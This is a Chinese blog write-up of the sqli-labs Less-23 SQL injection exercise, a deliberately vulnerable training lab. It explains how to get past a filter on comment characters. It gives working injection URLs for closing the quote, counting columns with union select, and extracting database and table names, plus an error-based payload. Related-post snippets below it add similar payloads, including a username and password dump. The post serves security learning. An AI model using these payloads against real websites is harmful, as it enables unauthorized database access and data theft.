sqli-labs(23)

最新推荐文章于 2025-05-22 16:15:58 发布
最新推荐文章于 2025-05-22 16:15:58 发布
阅读量324 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: sqli-labs笔记 web安全成长之路 文章标签: 安全 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/mmzkyl/article/details/113406384
本文探讨了在SQL注入中如何通过'and'操作符绕过单引号过滤,实现有效查询。介绍了报错注入作为更高效解决方案,并展示了使用`union select`判断列数的方法。重点讲解了数据库名和表名获取payload,以及报错注入案例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本关卡是使用 ’ 进行闭合,但是在注释的使用上做了一些限制
先测试下面这两个payload:

http://192.168.2.60/sqli-labs/Less-23?id=1'#
http://192.168.2.60/sqli-labs/Less-23?id=1'--+

若是不对输入进行过滤,上面两个payload均是能够返回正常页面,但是测试后发现上述两个payload均无法返回正常页面
# 与 --均被过滤,本题最大的难题便是无法通过注释来注释掉多余的单引号,总而无法完成注入,使用上面两个payload可能均会报如下错误:
在这里插入图片描述这个时候便需要一个新的解决办法,先看一个新的payload:

http://192.168.2.60/sqli-labs/Less-23?id=1' and '1'='1

该语句便能成功执行,其重点便在于 and ‘1’='1 通过该语句便能够成功处理多余的单引号,从而将其构成一个语法正确的sql语句
但是,我发现使用该种方法,便不能使用 order by 语句来对列的数目进行判断了,即下面这个payload是无效的

http://192.168.2.60/sqli-labs/Less-23?id=1' order by 10 and '1'='1

通过这个payload是无法判断列数的
不过可以使用类似下面这两个payload的样式来对列数进行判断

http://192.168.2.60/sqli-labs/Less-23?id=1' union select 1,2,3 and '1'='1
http://192.168.2.60/sqli-labs/Less-23?id=1' union select 1,2,3,4 and '1'='1

通过上方两个payload便可以确定列数
余下的操作也就没有什么难度了,与平时的操作没有什么大的区别,直接贴上payload
数据库名:

http://192.168.2.60/sqli-labs/Less-23?id=-1' union select 1,database(),3 and '1'='1

表名:

http://192.168.2.60/sqli-labs/Less-23?id=-1' union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1),3 and '1'='1

 
 
 
其实这一题我认为使用报错注入更为简单,报错注入可以省去判断列数等步骤,下面贴一个爆数据库名的payload:

http://192.168.2.60/sqli-labs/Less-23?id=-1' and extractvalue(null,concat(0x7e,(database()),0x7e)) and '1'='1

这里报错注入不做主要记录,仅仅是拓展一下思路

 
 
 
若有错误之处,欢迎指正

sqli-labs Less-23sqli-labs闯关指南 23)—Advanced injection
m0_54899775的博客
12-23 1352
sqli-labs Less-23sqli-labs闯关指南 23
sqli-labs(23-37)
qq_43395215的博客
08-26 750
文章目录第23关:第24关:第25关:第26关:第27关:第28关:第29关:第30关:第31关:第32关:第33关:第34关:第35关:第36关:第37关: 第23关: 23关感觉和第1关一样,先用第一关的操作试一试,先判断闭合方式 /Less-23/?id=1' and 1=2 --+ 判断所有的闭合方式都是无效,但是在报错信息里面,有关于“’ LIMIT 0,1’的提示,按理说不应该出现才对,因为我们注入的sql语句后面有注释符,这一部分应该是被注释的,所以应该是注释被屏蔽了,所以我们采用另一种构造
Sqlilabs-23
KAKA的博客
07-14 609
23 关对注入字符做了正则表达式的过滤,所以需要在引号上下功夫: http://sqlilabs/Less-23/?id=1' and '1 知道了原理构造起来就很简单了: –查表 http://sqlilabs/Less-23/?id=-1' union select 1,(select group_concat(table_name) from informatIon_schema.tables where table_schema=database()),3 and '1' = '1 简化: .
sqli-labs第二十三关——过滤注释符
最新发布
2403_88102829的博客
05-22 325
尝试输入id=1,id=1',id=1",id=1'),id=1"),只有单引号的时候产生报错尝试闭合?id=1' --+仍然报错,闭合失败查看这一关的源码发现注释符号被,所以尝试构造语句注释掉后面的内容成功闭合。
sqli-labs23
qq_53030229的博客
05-30 196
文章目录一、审查源码 一、审查源码 这里我就捡重要的代码挑出来说一下 preg_replace 函数执行一个正则表达式的搜索和替换,将reg $reg = "/#/"; $reg1 = "/--/"; $replace = ""; $id = preg_replace($reg, $replace, $id); $id = preg_replace($reg1, $replace, $id); $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
SQL-labs的第23关——注释被屏蔽 union联合查询攻击(Get)
qq_73393033的博客
08-03 308
这说明只有第一个和第二个位置是回显位,我们只需要在这两个位置进行注入就行。其实只有第二个是回显位,第一个也不是。但是如果是3个null,那么不会报错,这说明总共有3个注入位置。我们有添加了),但是仍然报错,这时我们怀疑注释符被屏蔽了。接下来,我们看一下,那个位置可以进行回显。我们猜测闭合方式是'。说明闭合方式是',并且注释符被屏蔽了。我们发现这里好像有回显,我们输入语句。使用报错注入也可以。
网络安全 - Web 安全靶场 - sqli-labs-php7.zip
10-13
sqli-labs-php7.zip资源描述 sqli-labs-php7.zip是一个专注于SQL注入学习的资源包,特别适用于PHP 7.3及以上版本的环境。它提供了一个全面的练习平台,帮助用户深入理解SQL注入攻击的原理,并提升相应的防御技巧。 ...
Sqli-labs-maste 靶场的下载, phpStudy 下载
09-13
"Sqli-labs-maste"是一个专门设计用来练习和提高SQL注入技术的靶场环境,它提供了各种不同难度级别的SQL注入漏洞供用户尝试解决,从而帮助学习者深入理解SQL注入的原理和防御技术。 与此同时,"phpStudy"是一个流行...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场
09-21
sqli-labs-master靶场是一个针对安全研究人员、开发者和网络安全爱好者的实践平台,特别设计用于学习和测试SQL注入攻击技术。SQL注入是一种常见的网络攻击手段,攻击者通过在应用程序的输入字段中注入恶意的SQL代码...
sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
sqli-labs靶场(23-38关)
weixin_51566481的博客
08-16 1347
sqli-labs,sql注入
(手工)【sqli-labs23】联合查询+报错回显
07-11 453
【SQL-联合查询+报错回显】
sqli.labs靶场(23关到28a关)
喜欢创作各种技术类文章,希望可以帮到你
02-01 1487
爆数据:1' and 1=2 union select 1,2,group_concat(username,':',password) from users where '1'='1。爆库:31') unionunion select select 1,database(),3 and ('1')=('1。爆库POC:1')%26(substr(database(),1,1)='s')%26('1')=('1。爆库:1' and 1=2 union select 1,2,database()'
基于Sqli-Labs靶场的SQL注入-23~24关
Joker
01-04 1488
重点讲二次注入
SQLi Labs Lesson23
1ame的博客
08-18 408
Lesson - 23 GET - Error based - stripcomments 首先进入欢迎界面 又回到了,最开始的地方: 构造?id=1,结果如图所示: 构造?id=1',结果如图所示: 没有关闭错误回显,同时没有对单引号进行过滤。 构造?id=0 ' union select 1,2,3 # 结果如图所示:
Sqli-Lab | Less 21-23
酉酉的博客
02-08 641
sqli靶场一直没来得及做,趁寒假把它做了,同时巩固下SQL注入 Less-21 Less-21 Cookie Injection- Error Based- complex - string cookie注入-基于错误-复杂-字符串 测试 登录进去 uname的值被加密,以=结尾,首先想到base64 不出意外是base64加密 burp抓包,然后改cookie中的uname再加密就...
sqli-labs--23-37关通关指南(详细)
weixin_44576725的博客
11-14 1980
文章目录Less-23Less-24Less-25Less-25aLess-26Less-26aLess-27Less-27aLess-28Less-28aLess-29背景知识:正题:Less-30Less-31Less-32Less-33Less-34Less-35Less-36Less-37总结Less-37总结 前言:本节开始对advanced injections关卡进行通关记录,23-38关 在这里补充一下信息收集的命令: @@version 数据库版本 @@datadir 数据库数据路径 @
sqli-labs-master第23
m_ing
05-17 1475
前言:从一开始我们是GET-----POST的路线来研究sql注入,这关我们在从头早来研究GET请求方式。 http://192.168.89.139/sqli-labs-master/Less-23/ 我看到这个页面很是熟悉,提示我们输入id值作为参考。 我们加个’试一下 再来利用and来测试下,加入注释符#,编码成%23同样的报错 我们感到很好奇,还是看下原本代码 对注释符等都进行了过滤 突然一懵,我查阅了一些资料,只能采用单引号闭合的方法来绕过了,我们试试看! ?id 1=1’ and ‘1’=
sqli-labs23
05-26
sqli-labs23是一个用于学习SQL注入的实验平台,它包含了多个不同难度级别的SQL注入漏洞,并提供了相应的练习场景。在这个平台上,你可以通过对不同的漏洞进行攻击和练习来提高自己的SQL注入技能。 sqli-labs23中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值